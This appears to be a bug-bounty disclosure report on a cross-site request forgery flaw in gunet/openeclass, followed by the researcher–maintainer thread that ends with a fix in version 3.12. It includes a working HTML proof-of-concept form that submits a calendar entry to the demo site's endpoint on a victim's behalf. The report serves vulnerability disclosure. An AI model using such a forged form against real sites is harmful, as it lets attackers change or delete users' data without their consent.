Cross-Site Request Forgery (CSRF) in gunet/openeclass

Valid

Reported on

Sep 29th 2021


Description

Missing CSRF Token at all form POST action in on Application

Proof of Concept

// CSRF PoC
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.openeclass.org/main/personal_calendar/index.php" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="rep" value="" />
      <input type="hidden" name="newTitle" value="test" />
      <input type="hidden" name="newContent" value="&lt;p&gt;test&lt;&#47;p&gt;" />
      <input type="hidden" name="startdate" value="01&#45;09&#45;2021&#32;17&#58;30" />
      <input type="hidden" name="duration" value="1&#58;00" />
      <input type="hidden" name="frequencynumber" value="1" />
      <input type="hidden" name="frequencyperiod" value="D" />
      <input type="hidden" name="enddate" value="" />
      <input type="hidden" name="refobjgentype" value="&#45;1" />
      <input type="hidden" name="refcourse" value="course&#58;1456" />
      <input type="hidden" name="refobjtype" value="0" />
      <input type="hidden" name="refobjid" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

With CSRF attack, the attacker can perform operations to add, edit, and delete data on the application through the victim.

lethanhphuc modified the report
a year ago
We have contacted a member of the gunet/openeclass team and are waiting to hear back a year ago
gunet/openeclass maintainer
a year ago

Maintainer


Thanks for your comment! We will take care of the above in the forthcoming release.

lethanhphuc
a year ago

Researcher


oke. don't forget to update the report when done

lethanhphuc
a year ago

Researcher


@maintainer Can you validate the report pls?

lethanhphuc
a year ago

Researcher


@maintainer Can you validate the report?

lethanhphuc
a year ago

Researcher


@maintainer Can you validate the report?

Alexandros Diamantidis validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alexandros Diamantidis marked this as fixed in 3.12 with commit 5d5deb a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation